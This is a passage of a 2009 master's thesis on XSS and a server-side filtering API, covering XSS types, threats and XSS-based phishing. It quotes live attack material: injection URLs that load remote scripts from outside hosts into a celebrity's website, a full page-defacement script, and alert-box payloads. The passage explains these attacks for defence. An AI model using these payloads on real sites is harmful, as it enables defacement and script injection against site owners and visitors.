SERVER SIDE API TO SECURE XSS
Thesis
Submitted in partial fulfillment of the requirements for the degree of
MASTER OF TECHNOLOGY in
COMPUTER SCIENCE & ENGINEERING - INFORMATION
SECURITY
by
KAMESH KUMAR BOGANATHAM
(07IS04F)
DEPARTMENT OF COMPUTER ENGINEERING
NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA
SURATHKAL, MANGALORE -575025
July, 2009
NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA, SURATHKAL
D E C L A R A T I O N
I hereby declare that the Report of the P.G. Project Work entitled “SERVER
SIDE API TO SECURE XSS” which is being submitted to National Institute of
Technology Karnataka Surathkal, for the award of degree of Master of Technology in
Computer Science and Engineering – Information Security in the Department of
Computer Engineering, is a bonafide report of the work carried out by me. The material
contained in this report has not been submitted to any university or Institution for the
award of any degree.
07IS04F, B KAMESH KUMAR
-----------------------------------------------------
(Register Number, Name and Signature of Student)
Department Computer Engineering
Place: NITK, SURATHKAL Date:
C E R T I F I C A T E
This is to certify that the P.G Project Work Report entitled “SERVER SIDE API TO
SECURE XSS” submitted by B KAMESH KUMAR (Reg.No. 07IS04F) as the record of
the work carried out by him, is accepted as the P.G Project Work Report Submission in
partial fulfillment of the requirements for the award of degree of Master of Technology in
Computer Science and Engineering – Information Security in the Department of
Computer Engineering, National Institute of Technology Karnataka, Surathkal.
External Guide
(Mr. Radhesh Mohandas )
Adjunct Faculty
Department of Computer Engineering
NITK Surathkal
Internal Guide
( Mr. Alwyn R Pais)
Senior Lecturer
Department of Computer Engineering
NITK Surathkal
Chairman- DPGC
DEDICATED TO
THEIR LORDSHIPS
SRI SRI RADHA VRINDAVANA CHANDRA
ACKNOWLEDGEMENTS
I take this opportunity to express my deepest gratitude and appreciation to all
those who have helped me directly or indirectly towards the successful completion of this
project.
First and foremost, I would like to express my sincere appreciation and gratitude
to my esteemed guides Mr. Radhesh Mohandas, Adjunct Faculty and Mr. Alwyn R
Pais, Senior Lecturer, Department of Computer Engineering, NITK Surathkal for their
insightful advice, encouragement, guidance, criticism, and valuable suggestions throughout
the course of my project work. Without their continued support and interest, this thesis
would not have been the same as presented here.
I express my deep gratitude to Mr. K. Vinay Kumar, Asst. Professor and Head,
Department of Computer Engineering, National Institute of Technology Karnataka,
Surathkal for his constant co-operation, support and for providing necessary facilities
throughout the M.Tech program.
I would like to take this opportunity to express my thanks to the teaching
and non-teaching staff of the Department of Computer Engineering, NITK for their
invaluable help and support in these two years of my study. I am also grateful to all my
classmates for their help, encouragement and invaluable suggestions.
My special thanks to my parents, supporting family and friends who continuously
supported and encouraged me in every possible way for successful completion of this
thesis. I am forever indebted to you all.
B Kamesh Kumar
ABSTRACT
With the Internet becoming ubiquitous in every aspect of our lives, there is an increase in
web applications providing day-to-day services such as banking, shopping, mail and news
updates. Most of these applications, however, have vulnerabilities or security loopholes such as
Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF) and SQL Injection, which are exploited
by attackers for malicious purposes. Hence there is a need for APIs and automated security tools
that identify and/or prevent these vulnerabilities before the application goes live.
This work focuses on developing a server-side API for Cross-site Scripting that
differentiates an XSS attack from a simple script. Novice users can thus enjoy a safe and better
browsing experience without any loss of functionality and without additional software or
configuration on the browser side. Such an API also reduces the burden on web administrators of
safeguarding their web applications from malicious XSS attacks.
Keywords: Web Applications, Cross-site Scripting (XSS), Cross-site Request forgery
(CSRF/XSRF), Server-side XSS Filter.
TABLE OF CONTENTS
Title
Declaration
Certificate
Dedication
Acknowledgement
Abstract
Table of contents
List of figures
List of tables
Nomenclature/Acronyms
Chapter I INTRODUCTION
1.1 Cross-site Scripting Attacks
1.2 Motivation
1.3 Organization of Thesis
Chapter II CROSS-SITE SCRIPTING
2.1 Introduction to Cross-site Scripting
2.2 A Basic Example
2.3 Malicious Code
2.4 Classification of Cross-site Scripting
2.4.1 Reflected XSS
2.4.2 Stored XSS
2.4.3 DOM – based XSS
2.5 Threats from Cross-site Scripting
2.6 Cross-site Scripting and Phishing
2.6.1 Introduction to Phishing
2.6.2 Phishing Tricks
2.6.3 Cross-Site Scripting based Phishing Attack
2.7 Real World Examples
2.8 XSS Vs. CSRF
Chapter III EXISTING XSS DEFENSES
3.1 AntiSamy
3.2 The strip_tags()
3.3 PHP Input Filter
3.4 HTML_Safe/SafeHTML
3.5 Kses
3.6 htmLawed
3.7 Safe HTML Checker
3.8 HTML Purifier
3.9 Summary
Chapter IV PROBLEM STATEMENT
Chapter V DIFFERENTIATING XSS FROM SIMPLE SCRIPTS
Chapter VI IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS
6.1 Procedure
6.2 Implementation Details
6.3 Working of SecureXSS
6.4 Results
Chapter VII CONCLUSIONS
REFERENCES
APPENDIX I OWASP The Ten Most Critical Web Application Security Vulnerabilities
APPENDIX II Results of SecureXSS API
APPENDIX III Results of HTML Purifier
APPENDIX IV Simple HTML DOM Parser array
Resume (Bio-Data)
LIST OF FIGURES
Fig. No. Description
2.1 Sample PHP Code for Site Search Engines
2.2 Sample HTTP Response Page Containing the <script> Tag
2.3 Cross-Site Scripting in Site Search Engines
2.4 Sample Malicious Code for Cookie Theft
2.5 An Attack Scenario of Cross-Site Scripting
2.6 Examples of Phishing Tricks
2.7 Cross-Site Scripting based Phishing Attack
2.8 Maria Sharapova’s Home Page
2.9 Defacement
6.1 Server-side XSS Filtering API
6.2 SecureXSS overhead
1 MITRE data on Top 10 web application vulnerabilities for 2006
LIST OF TABLES
Table No. Description
3.1 Kses API’s
5.1 Tags and its attributes which are in favour of attackers
5.2 Extensions allowed
5.3 DOM Properties which will cause XSS attacks
6.1 SecureXSS timing test (overhead) results
1 OWASP Top 10 Web Application Vulnerabilities
2 Results of SecureXSS
3 Results of HTML Purifier
Nomenclature/Acronyms
Notation Description
XSS Cross-site Scripting
OWASP Open Web Application Security Project
XSRF/CSRF Cross-site Request Forgery
PHP PHP: Hypertext Preprocessor
URL Uniform Resource Locator
URI Uniform Resource Identifier
HTML Hyper Text Markup Language
HTTP Hyper Text Transfer Protocol
CHAPTER 1
INTRODUCTION
With the proliferation of the Internet, there has been a surge in the web services
offered by many corporations, such as e-banking and e-shopping. As most of these applications are
not developed with the best security practices, there is an increase in malicious attacks against
these services, which exploit the vulnerabilities in these applications for material gain or
to steal the credentials of the novice users of these web services. This has resulted in more
research focus in this domain to create new tools and techniques to thwart these kinds of
attacks. Many research groups in academia and industry are working in this domain to
find more secure programming practices and tools that identify the vulnerabilities of these
applications during the development phase and detect attacks in real time.
The OWASP Top 10 report [OWA] lists the following as the ten most critical web
application security vulnerabilities that are being exploited:
Cross Site Scripting (XSS)
Injection Flaws (SQL Injection, XPath Injection, LDAP Injection, etc)
Malicious File Execution
Insecure Direct Object Reference
Cross Site Request Forgery (CSRF)
Information Leakage and Improper Error Handling
Broken Authentication and Session Management
Insecure Cryptographic Storage
Insecure Communications
Failure to Restrict URL Access
In this work, we focus on Cross-site Scripting (XSS), which allows an attacker to
insert a malicious script into a web application and thereby harm a legitimate
user. In the process, we developed a server-side XSS filtering API, which differentiates a potential
XSS attack from a simple script and strips it off. The main goal of this work is to provide an XSS
solution that web administrators can use to safeguard their applications from attackers, which results in
a safe and better browsing experience for the lay user without any loss of functionality.
1.1 Cross-site Scripting Attacks
The cross-site scripting attack method was first discussed in a CERT advisory back in 2000
[CER]. Even today, cross-site scripting (XSS) is one of the most common vulnerabilities in
web applications. It is the result of insufficient filtering of data received from a malicious
person and then sent to third parties. Systems that receive data from users and display it in other
users' browsers are very vulnerable to XSS attacks. Wikis, forums, chats and web mail are all
good examples of applications highly susceptible to XSS.
Cross-site scripting (XSS) can be defined as a security exploit in which an attacker inserts
malicious code into a page returned by a web server trusted by a user. This code may reside on
the web server or be explicitly inserted when the user browses to the particular web site; it may
contain JavaScript or just HTML; and it may use third-party sites as sources or rely only upon the
resources of the targeted server. XSS attacks typically involve JavaScript code from a
malicious web server executing in a user's web browser. Chapter 2 gives a brief overview
of the XSS attack and its types, with examples and illustrations.
1.2 Motivation
In recent years, dynamic Web applications such as online banking systems and online
shops have become more and more popular. At the same time, security attacks that exploit Web
application vulnerabilities are increasing dramatically. Among such vulnerabilities, Cross-Site
Scripting is the most common security issue (as already noted, it is the topmost vulnerability
in the OWASP 2007 report). It enables attackers to steal credentials from a victim, to gather
sensitive information or to make a Web site unavailable. To mitigate such serious impact,
Web applications should use an effective solution for Cross-Site Scripting flaws. Manual
security testing (for mitigation) is, however, both expensive and error-prone due to the increasing
complexity of Web applications. Hence, automated tools for detecting Cross-Site Scripting flaws
are essential.
We have investigated some available solutions that claim to be state of the art.
Unfortunately, most of them are not effective, as they fail to differentiate simple
scripts from potential XSS attacks. Therefore, we have developed SecureXSS (pronounced
“Secure Excess”), an open-source server-side filter for detecting and filtering Cross-Site Scripting
vulnerabilities in Web applications.
1.3 Organization of Thesis
The rest of the thesis is organized as follows. Chapter 2 gives brief information about
the XSS attack and its types, with live examples and illustrations. Chapter 3 deals with the available
solutions for XSS, while Chapter 4 describes the problem statement. Chapter 5 details our
solution to mitigate XSS, called SecureXSS: Server-side XSS Filter. Chapter 6 gives the
implementation details and experimental results, and Chapter 7 concludes the thesis along with
the future work, followed by the references used. Appendix I details the Top 10 most critical web
application vulnerabilities. Appendix II shows the results of the SecureXSS API, Appendix III
shows the results of HTML Purifier, and Appendix IV shows the Simple HTML DOM Parser array.
CHAPTER 2
CROSS-SITE SCRIPTING
Cross-Site Scripting vulnerabilities are quite widespread. A look at the
Bugtraq mailing list shows that postings reporting Cross-Site Scripting holes appear
regularly. As mentioned in the introduction chapter, Cross-Site Scripting vulnerabilities are the
most common security loopholes, found in over 80 percent of Web sites. Hence, the likelihood
that a Web site is vulnerable to XSS is extremely high. According to the Information-Technology
Promotion Agency (IPA), from July 2004 to September 2005 attacks using Cross-Site Scripting
were the most serious issue among all Web application attacks (accounting for 42%), while
SQL Injection ranked second with 16%. Thus, it is imperative to make Web applications
secure against XSS attacks.
In this chapter, we start by briefly explaining the XSS problem with a basic example, and
then give an introduction to malicious code and how XSS attacks work. After presenting the
classification of XSS, we describe the risks that XSS may cause.
2.1 Introduction to Cross-site Scripting
As introduced in the previous chapter, Web applications are becoming not only
increasingly popular but also more and more vulnerable. Attack techniques exploiting various
types of Web application vulnerabilities are becoming more and more sophisticated. A particular
class of these attack techniques is referred to as Cross-Site Scripting (or HTML Code Injection),
which takes advantage of Web applications that do not validate user input before
displaying it back to the user. Such attacks commonly involve three parties: the user (victim), the
attacker, and the XSS-vulnerable website. The attacker uses the poorly designed
legitimate website as a vehicle to execute malicious code in the user’s browser, as if it had
originated from a trusted source.
As explained above, XSS attacks occur when an attacker uses a web application to send
malicious code (generally in the form of a browser-side script) to a different end user. Flaws that
allow these attacks to succeed are quite widespread and occur anywhere a web application
uses input given by a user in the output it generates without validating or encoding it. An attacker
can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no
way to know that the script should not be trusted, and will execute the script. Because the browser
thinks the script came from a trusted source, the malicious script can access cookies, session
tokens, or other sensitive information retained by the browser and used with that site. These
scripts can even rewrite the content of the HTML page [XSS].
2.2 A Basic Example
Most web applications contain site search engines. Such site search engines usually
display the results on the screen together with the search phrase entered by the user. As an example,
consider the PHP code shown in figure 2.1, in which the text after “Search results for” is
generated dynamically from the user input. When the search phrase (user input) is not
sanitized properly, Cross-Site Scripting may occur, which can also be used as an attack. As illustrated in
figure 2.3 (a), after clicking on the search button, we get the search phrase entered in the form
field (here, search text) displayed in the response page, regardless of the search results. We
now experiment with HTML tags. As illustrated in figure 2.3 (b), the search phrase returned (here,
Hello World) is formatted as bold instead of being displayed as the text we entered (Hello World
embedded in the HTML tag <b>). Besides displaying the formatted search phrase, we can also
cause JavaScript code to be executed in the browser (most browsers enable JavaScript by
default). As illustrated in figure 2.3 (c), in place of the search phrase, a JavaScript alert
box with the text XSS Vulnerability pops up. The reason is that the browser interprets the
search phrase we entered as an HTML tag instead of text. In the sample HTTP response page shown
in figure 2.2, the <script> tag introduces a JavaScript program and thus it is not displayed by
the browser.
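The behaviour described above can be reproduced outside PHP. The following is a minimal sketch in JavaScript (Node.js), not the code of figure 2.1; the names escapeHtml, renderSearchResultsUnsafe and renderSearchResultsSafe are hypothetical and introduced only for illustration. It contrasts a search phrase that is echoed verbatim with the same phrase HTML-encoded before output, so that the browser would treat it as text.

```javascript
// Hypothetical helper: encode the characters that are significant in HTML.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the search phrase is copied into the page as-is.
function renderSearchResultsUnsafe(phrase) {
  return "<p>Search results for " + phrase + "</p>";
}

// Safer: the search phrase is encoded before it is placed in the page.
function renderSearchResultsSafe(phrase) {
  return "<p>Search results for " + escapeHtml(phrase) + "</p>";
}

const phrase = '<script>alert("XSS Vulnerability")</script>';
console.log(renderSearchResultsUnsafe(phrase)); // the script tag reaches the browser intact
console.log(renderSearchResultsSafe(phrase));   // the script tag is rendered as plain text
```

Encoding at output time is only one possible defence; it is shown here because it makes the difference between "text" and "tag" visible in a few lines.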
2.3 Malicious Code
Considering the example above, one may ask: it just throws up an alert box, so how dangerous can
it be? Indeed, alert pop-ups are annoying, but they do not really cause security issues. We
use them only to demonstrate that a Web application is vulnerable to XSS. If the JavaScript alert
function can be executed, there is generally no reason why other JavaScript functions containing
malicious code cannot succeed.
Figure 2.1: Sample PHP Code for Site Search Engines
Figure 2.2: Sample HTTP Response Page Containing the <script> Tag
(a) Search for a Simple Text
(b) Search for a Formatted Text
(c) Search for an Executable Script
Figure 2.3: Cross-Site Scripting in Site Search Engines
Attackers exploit XSS vulnerabilities in order to execute injected malicious code.
What does malicious code mean, and what impact may it have? Next, we give an
introduction to malicious code.
Most Web browsers are able by default to run scripts embedded in Web pages downloaded from a
Web server. Such scripts are usually written in scripting languages such as
JavaScript and VBScript and are introduced by the HTML scripting tag <script>. In
addition to the scripting tag, many other HTML tags can be misused to load
malicious code.
Malicious code is able to rewrite an HTML page with fraudulent content, or redirect the
client’s browser to the attacker’s page; it can even access authentication cookies, session
management tokens, or other sensitive information. With this information, an attacker is able to
hijack the victim’s active session and thus bypass the authentication process completely.
Consider the script in figure 2.4. When this script is injected successfully into a page of a site (e.g.
www.xss.site) and a victim’s browser loads this page, the embedded script is
executed and stores the victim’s cookie from this site. Now the attacker is able to access the
victim’s account and masquerade as the victim (figure 2.5 illustrates this scenario).
Figure 2.4: Sample Malicious Code for Cookie Theft
Figure 2.5: An Attack Scenario of Cross-Site Scripting
The steps shown in Figure 2.5 are explained below in detail.
(1) A user logs in to an XSS-vulnerable site.
(2) The site sets a cookie (e.g. ID=123) for the user, which is saved in the browser.
(3) An attacker knows that the site displays a parameter without validating it (e.g. the parameter
“name”); he constructs a link with the malicious code described in figure 2.4 and tricks the user
into clicking on this link.
(4) The unsuspecting user clicks on the link, and an HTTP request containing the malicious code
from the attacker is sent to the XSS-vulnerable site.
(5) In response to the request, the site generates a response page with the malicious code embedded
and returns this page to the user.
(6) While the user views the response page, the malicious code is executed in the user’s browser and
the cookies of that web site are sent to the attacker.
(7) The attacker now has access to the user’s account and can masquerade as the user.
The possible sources of malicious code include URL query strings, HTML form fields,
HTTP headers and cookies. Since malicious code is embedded in websites the user trusts,
it is allowed to perform dangerous operations unhindered. Websites using SSL are no better
protected against malicious code than other websites. SSL only encrypts the data (including
the malicious code) transmitted over the connection; it does not attempt to validate the data. Therefore,
XSS attacks succeed as usual, except that they occur over an encrypted connection.
2.4 Classification of Cross-site Scripting
Generally, Cross-Site Scripting attacks can be classified into three categories: Reflected
(non-persistent), Stored (persistent) and DOM-based. Before we describe these three categories,
we introduce the DOM, which is needed to understand the third type of XSS.
The Document Object Model (DOM) is a cross-platform and language-independent
convention for representing and interacting with objects in HTML, XHTML and XML
documents. Objects under the DOM (also sometimes called "Elements") may be specified and
addressed according to the syntax and rules of the programming language used to manipulate
them. In simple terms, the Document Object Model is the way JavaScript sees its containing
HTML page and browser state. Next, we will describe these three categories respectively.
2.4.1 Reflected XSS
Reflected XSS (also referred to as non-persistent XSS) is by far the most common type.
It means that, after a request, the page containing the malicious code is returned to the Web
browser immediately.
Normally, a non-persistent XSS attack requires deceiving a user, by means of social engineering
techniques, into visiting a specially manipulated URL with embedded malicious code. When a
user is tricked into clicking on the malicious link, the code embedded in the URL is
executed in the Web browser, and the attack succeeds.
2.4.2 Stored XSS
In contrast to reflected XSS, stored XSS (also referred to as persistent XSS) means
that when malicious code is injected into a website, it is stored (in a database or in XML files)
over a longer period and displayed to users in a web page later. This kind of XSS is more serious
than the other types, because an attacker can inject malicious code just once and affect a large
number of unsuspecting users; it is not even necessary for the attacker to trick the users into
clicking on a link containing malicious code. For example, if the malicious code is stored in a
database, an innocent user may become a victim just by viewing the
page that contains the stored malicious code, without clicking on any link.
There is another kind of stored XSS that uses techniques to manipulate the user’s cookies.
With such techniques, attackers are able to tamper with the cookie content, inserting malicious code, and
cause the code to be executed each time the user visits the website.
Web applications that are especially vulnerable to stored XSS
include discussion forums, guest books and webmail systems. RSS feeds, which are popular
in web blogs and news sites, can also be used as a vehicle for such attacks.
Here is a real-world example of a persistent XSS attack that occurred on the
popular online auction website eBay. As reported by US-CERT in April 2006, when an eBay
user posts an auction, <script> tags are allowed to be included in the auction description,
which creates an XSS vulnerability in the eBay Web site. Attackers exploited this
vulnerability to redirect auction viewers to a fake eBay login page that requests login information
in order to steal credentials [USC].
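The "inject once, affect many" property of stored XSS can be illustrated with a small sketch. The code below is an assumption-laden toy in JavaScript (Node.js): the in-memory array guestBook stands in for a database, and postComment, renderGuestBook, escapeHtml and the host attacker.example are hypothetical names chosen for the illustration. A comment is stored exactly as submitted and is later rendered for every visitor; encoding at output time keeps the stored markup from being interpreted.

```javascript
// Hypothetical in-memory store standing in for a database table of comments.
const guestBook = [];

// Hypothetical helper: encode the characters that are significant in HTML.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The comment is stored once, exactly as submitted.
function postComment(author, message) {
  guestBook.push({ author, message });
}

// Every later visitor receives all stored comments; encoding happens at output time.
function renderGuestBook() {
  return guestBook
    .map((c) => "<li>" + escapeHtml(c.author) + ": " + escapeHtml(c.message) + "</li>")
    .join("\n");
}

postComment("alice", "Nice site!");
postComment("mallory", "<script>document.location='http://attacker.example/'</script>");
console.log(renderGuestBook());
```

Without the two escapeHtml calls, the second entry would be delivered as a live script to every user who views the guest book, with no link to click.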
2.4.3 DOM – based XSS
Besides the XSS attacks described above, which are considered standard XSS, there is
a third kind of XSS attack, namely DOM-based XSS. Unlike the standard XSS attacks,
which rely on dynamic web pages, a DOM-based XSS attack does not necessarily require sending
malicious code to the server and can thus also use static HTML pages.
The problem lies in the client-side script (i.e. JavaScript) within the page itself,
which retrieves data from certain DOM objects without encoding the URL characters. The DOM
objects mentioned here include:
- document.location
- document.URL
- document.referrer
We make this clear by means of a simple example. Assume that the following script
resides within an HTML page; this script displays the text retrieved from the current URL
somewhere in the page.
document.write(document.URL);
When we enter the following URL into the address bar of a browser, we get an alert
box with the text “XSS”, which demonstrates the XSS hole.
http://www.xss.site/index.html#<script>alert("XSS")</script>
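Why the server need not see a DOM-based payload can be shown with a short sketch. The JavaScript below runs in Node.js and only manipulates strings; it does not touch a real DOM. The function names splitAtFragment, renderFragmentUnsafe, renderFragmentSafe and escapeHtml are hypothetical, and writing only the fragment (rather than the whole URL, as document.write(document.URL) does) is a simplification made for the illustration. It relies on the fact that the part of a URL after "#" is not included in the HTTP request.

```javascript
// Split a URL string at the first "#": the part before it is what the browser
// requests from the server; the part after it (the fragment) stays in the browser.
function splitAtFragment(url) {
  const i = url.indexOf("#");
  return i === -1
    ? { sentToServer: url, fragment: "" }
    : { sentToServer: url.slice(0, i), fragment: url.slice(i + 1) };
}

// Hypothetical helper: encode the characters that are significant in HTML.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Stand-ins for a page script that writes part of the URL into the page.
function renderFragmentUnsafe(url) {
  return splitAtFragment(url).fragment;
}
function renderFragmentSafe(url) {
  return escapeHtml(splitAtFragment(url).fragment);
}

const url = 'http://www.xss.site/index.html#<script>alert("XSS")</script>';
const parts = splitAtFragment(url);
console.log(parts.sentToServer);       // the server sees no payload
console.log(renderFragmentUnsafe(url)); // the markup a careless page script would write
console.log(renderFragmentSafe(url));   // the encoded text a careful page script would write
```

In a real page, the safe variant would typically assign the value as text (for example through a text node) rather than writing markup.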
2.5 Threats from Cross-site Scripting
Some of the common threats from XSS attacks are listed below:
Cookie theft and account hijacking: one of the most severe XSS attacks involves cookie
theft and account hijacking, as in the scenario illustrated previously in figure 2.5. Credentials
stored in cookies can be stolen by attackers, so that it is possible for attackers to steal a user’s
identity and access his confidential information. For normal users, this means that their
personal data, such as credit card information or bank account details, may be misused. For users
with high privileges, such as administrators, if their accounts are stolen via XSS,
attackers are able to access the web server and the backend database system, and thus
gain full control of the web application.
Misinformation: another critical threat from XSS is the danger of credentialed
misinformation. XSS attacks may include malicious code that spies on the user’s surfing
behavior and thus gathers statistics (e.g. by logging the user’s clicks or the history of sites visited).
Consequently, it results in loss of privacy. Another kind of misinformation is that
malicious code is able to modify the presentation of page content once it is executed in a
browser. This enables an attacker to manipulate a press release or important news, or even
to influence the stock price of companies, which results in loss of integrity. A malicious script
may also modify the login page; combined with Phishing, a victim may unknowingly submit his login
information to the attacker.
Denial of Service: from the point of view of an enterprise, it is imperative that its Web applications
are accessible all the time. However, a malicious script can lead to loss of
availability. For example, it can redirect users’ browsers to other websites. The spread of
the XSS worm on Myspace.com described previously is another example of a Denial of
Service attack. From the point of view of users, a malicious script can also make a user’s browser crash or
become inoperable (e.g. by throwing infinitely many alert boxes), so that the user cannot
reach the Web application any more.
Browser exploitation: a malicious script can redirect client browsers to an attacker’s site,
so that the attacker is able to take advantage of a specific security hole in the web browser to
control the user’s computer by executing arbitrary commands, for example to install Trojan horse
programs on the client or to upload local data containing sensitive information.
2.6 Cross-site Scripting and Phishing
This part of the thesis gives a brief explanation of phishing based on cross-site
scripting. Section 2.6.1 gives an introduction to phishing and Section 2.6.2 explains some
phishing tricks, while Section 2.6.3 explains cross-site scripting based phishing attacks.
2.6.1 Introduction to Phishing
Phishing (as in fishing for sensitive data) is the act of tricking someone into giving away
sensitive information such as credit card numbers, passwords, bank account information, or other
personal data using social engineering techniques [STA, OLL].
Phishing usually uses emails as its medium. These emails appear to come from banks and ask users to
log in to their online banking system, change their password, or enter their credit card number.
In recent years, Phishing has become a major issue. According to the Pew Study [PEW], by
October 2005 more than a third of email users had been targeted by Phishing, and two percent had
responded by providing personal financial information.
(a) Similar or Misspelled Domain Names
(b) URL Hex Encoding
(c) Using HTML Coding to Hide the Real Link
Figure 2.6: Examples of Phishing Tricks
2.6.2 Phishing Tricks
Tricks commonly used for Phishing include:
Similar or misspelled domain names (see figure 2.6(a)). Phishers may also substitute the
lowercase “L” with the uppercase “I”, because the two are hard for users to
distinguish.
Using encoded URLs. The URL is encoded using Hex, Unicode, or UTF-8 encoding to disguise
its true value. An example of Hex encoding is illustrated
in figure 2.6(b).
Using HTML coding to hide the real link (see figure 2.6(c)). The real link is not directly
visible to the user. As soon as he clicks the link, he is taken to the fake site of the attacker
instead of the site indicated.
Using fake banner advertising. Phishers can copy banner advertising and publish it
on the Internet. Similar to the example above, the banner is linked to the fake site,
and the destination is not directly visible to the users.
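The "hidden real link" trick can be made concrete with a small check. The sketch below, in JavaScript (Node.js), is only an illustration and not a phishing defence proposed by this thesis; the function names hostOf and linkTextMismatch and the hosts www.bank.example and attacker.example are hypothetical. It flags a link whose visible text is itself a URL that names a different host than the link's real target.

```javascript
// Return the lower-cased host name of a URL string, or null if it does not parse.
function hostOf(text) {
  try {
    return new URL(text).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Flag a link whose visible text is a URL pointing to a different host
// than the href the browser will actually follow.
function linkTextMismatch(visibleText, href) {
  const shown = hostOf(visibleText.trim());
  const actual = hostOf(href);
  return shown !== null && actual !== null && shown !== actual;
}

console.log(linkTextMismatch("http://www.bank.example/login", "http://attacker.example/login"));
console.log(linkTextMismatch("http://www.bank.example/", "http://www.bank.example/login"));
console.log(linkTextMismatch("Click here", "http://attacker.example/"));
```

A check of this kind says nothing about look-alike domain names or banner images, which need different heuristics.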
2.6.3 Cross-Site Scripting based Phishing Attack
The Phishing tricks described above misdirect users to fake sites. If, however, the Phishing site
is the real site, the Phishing attack is more dangerous, since users trust the real site. Such
attacks can be achieved when a site is vulnerable to XSS. The example below demonstrates
such an attack.
For a Cross-site Scripting based Phishing attack, the following steps are taken:
1. Finding Cross-site Scripting vulnerabilities in a site.
2. Embedding malicious content into a fraudulent email. The attacker could use an encoded URL
to obfuscate the true destination.
3. Sending the spoofed email to victims.
When a user clicks the link in the spoofed email, the login part of the returned page is
replaced with the fake login page from the attacker’s site, while the other contents of the page and the
address bar remain unchanged. The user is not aware of this and logs in with his personal
information, which is sent to the attacker. After login, the user is redirected back to the
real site. Figure 2.7 illustrates this scenario.
XSS based Phishing attacks can bypass traditional Phishing defenses such as
blacklists and SSL notices. The first step in an XSS based Phishing attack is to find XSS
vulnerabilities in an insecure Web site.
2.7 Real World Examples
On April 1, 2007, there was an interesting prank on the home page of Maria Sharapova (the famous
tennis player) (Figure 2.8). Apparently someone had identified an XSS vulnerability, which
was used to inform Maria’s fan club that she was quitting her career in tennis to become a Cisco
CCIE Security Expert.
The URL that causes the XSS issue looks like the following:
http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/script%3E%3C!--&pagenumber=1
Figure 2.7: Cross-Site Scripting based Phishing Attack
Notice that the actual XSS vulnerability affects the page GET parameter, whose value is
URL-encoded. In its decoded form, the value of the page parameter looks like this:
// --></script><script src=http://www.securitylab.ru/upload/story.js></script><!--
The first part of the payload (// -->) comments out everything
generated by the page up until that point. The second part of the payload includes a remote script
hosted at www.securitylab.ru. Finally, the last few characters of the URL make the rest of
the page disappear.
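The decoding of the page parameter can be checked mechanically. The following JavaScript (Node.js) sketch uses the standard decodeURIComponent function; the helper rawQueryValue is a hypothetical name written for this illustration, and the URL is the one quoted in this section.

```javascript
// The attack URL quoted in this section, split only for readability.
const attackUrl =
  "http://www.mariasharapova.com/defaultflash.sps?page=//%20--" +
  "%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/script" +
  "%3E%3C!--&pagenumber=1";

// Extract the raw (still encoded) value of one query parameter.
function rawQueryValue(url, name) {
  const query = url.slice(url.indexOf("?") + 1);
  for (const pair of query.split("&")) {
    const eq = pair.indexOf("=");
    if (eq !== -1 && pair.slice(0, eq) === name) {
      return pair.slice(eq + 1);
    }
  }
  return null;
}

// Percent-decoding reveals the markup that the vulnerable page echoes.
const decoded = decodeURIComponent(rawQueryValue(attackUrl, "page"));
console.log(decoded);
```

Seen in decoded form, the three parts of the payload (the comment terminator, the remote script element and the trailing comment opener) are easy to tell apart.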
Figure 2.8 Maria Sharapova’s Home Page
The script hosted at SecurityLab has the following content:
document.write("Maria Sharapova");
document.write("Maria Sharapova is glad to announce you her new decision, which changes her all life for ever. Maria has decided to quit the carrier in Tennis and become a Security Expert. She already passed Cisco exams and now she has status of an official CCIE. Maria is sure, her fans will understand her decision and will respect it. Maria already accepted proposal from DoD and will work for the US government. She also will help Cisco to investigate computer crimes and hunt hackers down.");
Let’s have a look at the following example provided by RSnake from ha.ckers.org.
RSnake hosts a simple script (http://ha.ckers.org/weird/stallowned.js) that performs XSS
defacement on every page where it is included. The script is defined like this:
var title = "XSS Defacement";
var bgcolor = "#000000";
var image_url = "http://ha.ckers.org/images/stallowned.jpg";
var text = "This page has been Hacked!";
var font_color = "#FF0000";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
  document.title = pageTitle;
  document.body.innerHTML = '';
  document.bgColor = bgColor;
  var overLay = document.createElement("div");
  overLay.style.textAlign = 'center';
  document.body.appendChild(overLay);
  var txt = document.createElement("p");
  txt.style.font = 'normal normal bold 36px Verdana';
  txt.style.color = fontColor;
  txt.innerHTML = pageText;
  overLay.appendChild(txt);
  if (image_url != "") {
    var newImg = document.createElement("img");
    newImg.setAttribute("border", '0');
    newImg.setAttribute("src", imageUrl);
    overLay.appendChild(newImg);
  }
  var footer = document.createElement("p");
  footer.style.font = 'italic normal normal 12px Arial';
  footer.style.color = '#DDDDDD';
  footer.innerHTML = title;
  overLay.appendChild(footer);
}
In order to use the script we need to include it the same way we did when defacing Maria
Sharapova’s home page. In fact, we can apply the same trick again. The defacement URL is:
http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E%3C!--&pagenumber=1
The result of the defacement is shown in Figure 2.9. Website defacement, XSS based or
not, is an effective mechanism for manipulating the masses and establishing political and non-
political points of view. Attackers can easily forge news items, reports, and important data by
using any of the XSS attacks. It takes only a few people to believe what they see in order to turn
something fake into something real.
The examples explained here are taken from [JEG]; refer to the same source for many more real-world
XSS attacks and examples.
Figure 2.9 Defacement
2.8 XSS Vs. CSRF
Cross-Site Scripting (XSS) and Cross-site Request Forgery (CSRF) attacks are frequently
